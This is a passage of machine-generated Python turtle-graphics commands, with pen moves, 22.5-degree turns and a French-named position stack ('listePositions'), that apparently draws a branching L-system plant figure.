right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.85,301.42)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((124.85,301.42), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.85,301.42)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((136.17,312.74), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((136.17,312.74)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((136.17,312.74), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((136.17,312.74)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((150.95,318.86), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((150.95,318.86)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((150.95,318.86), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((150.95,318.86)), setheading(22.5) ;
pu(), setposition((118.73,286.64)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((134.73,286.64), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((134.73,286.64)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((134.73,286.64), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((134.73,286.64)), setheading(0.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((150.73,286.64)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((150.73,286.64)), setheading(0.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 337.5), ((162.04,275.33), 292.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((162.04,275.33)), setheading(292.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 337.5), ((162.04,275.33), 315.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((162.04,275.33)), setheading(315.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 337.5), ((176.83,269.20), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((176.83,269.20)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 337.5), ((176.83,269.20), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((176.83,269.20)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 337.5), ((192.83,269.20), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((192.83,269.20)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 337.5), ((192.83,269.20), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((192.83,269.20)), setheading(0.0) ;
pu(), setposition((150.73,286.64)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 0.0), ((165.51,292.76), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.51,292.76)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 0.0), ((165.51,292.76), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.51,292.76)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 0.0), ((181.51,292.76), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((181.51,292.76)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 0.0), ((181.51,292.76), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((181.51,292.76)), setheading(0.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 0.0), ((196.29,286.64), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((196.29,286.64)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 0.0), ((196.29,286.64), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((196.29,286.64)), setheading(337.5) ;
pu(), setposition((150.73,286.64)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((165.51,292.76), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.51,292.76)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((165.51,292.76), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.51,292.76)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((180.29,298.89)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((180.29,298.89)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 0.0), ((195.08,292.76), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.08,292.76)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 0.0), ((195.08,292.76), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.08,292.76)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 0.0), ((211.08,292.76), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((211.08,292.76)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 0.0), ((211.08,292.76), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((211.08,292.76)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 0.0), ((225.86,298.89), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((225.86,298.89)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 0.0), ((225.86,298.89), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((225.86,298.89)), setheading(22.5) ;
pu(), setposition((180.29,298.89)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 22.5), ((191.61,310.20), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.61,310.20)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 22.5), ((191.61,310.20), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.61,310.20)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 22.5), ((206.39,316.32), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((206.39,316.32)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 22.5), ((206.39,316.32), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((206.39,316.32)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 22.5), ((222.39,316.32), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((222.39,316.32)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 22.5), ((222.39,316.32), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((222.39,316.32)), setheading(0.0) ;
pu(), setposition((180.29,298.89)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((191.61,310.20), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.61,310.20)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((191.61,310.20), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.61,310.20)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((202.92,321.51)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((202.92,321.51)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 22.5), ((218.92,321.51), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.92,321.51)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 22.5), ((218.92,321.51), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.92,321.51)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 22.5), ((233.70,327.64), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((233.70,327.64)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 22.5), ((233.70,327.64), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((233.70,327.64)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 22.5), ((245.02,338.95), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((245.02,338.95)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 22.5), ((245.02,338.95), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((245.02,338.95)), setheading(45.0) ;
pu(), setposition((202.92,321.51)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 45.0), ((209.04,336.30), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((209.04,336.30)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 45.0), ((209.04,336.30), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((209.04,336.30)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 45.0), ((220.36,347.61), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((220.36,347.61)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 45.0), ((220.36,347.61), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((220.36,347.61)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 45.0), ((235.14,353.73), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((235.14,353.73)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 45.0), ((235.14,353.73), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((235.14,353.73)), setheading(22.5) ;
pu(), setposition((202.92,321.51)), setheading(45.0) ;
pu(), setposition((118.73,286.64)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((124.85,301.42), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.85,301.42)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((124.85,301.42), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.85,301.42)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.98,316.20)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.98,316.20)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 45.0), ((145.76,322.33), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((145.76,322.33)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 45.0), ((145.76,322.33), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((145.76,322.33)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 45.0), ((157.07,333.64), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((157.07,333.64)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 45.0), ((157.07,333.64), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((157.07,333.64)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 45.0), ((163.19,348.42), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((163.19,348.42)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 45.0), ((163.19,348.42), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((163.19,348.42)), setheading(67.5) ;
pu(), setposition((130.98,316.20)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 67.5), ((130.98,332.20), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.98,332.20)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 67.5), ((130.98,332.20), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.98,332.20)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 67.5), ((137.10,346.99), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((137.10,346.99)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 67.5), ((137.10,346.99), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((137.10,346.99)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 67.5), ((148.41,358.30), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((148.41,358.30)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 67.5), ((148.41,358.30), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((148.41,358.30)), setheading(45.0) ;
pu(), setposition((130.98,316.20)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((142.29,327.52), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((142.29,327.52)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((142.29,327.52), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((142.29,327.52)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.60,338.83)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.60,338.83)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 22.5), ((169.60,338.83), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.60,338.83)), setheading(337.5) ;
left(22.5) ;
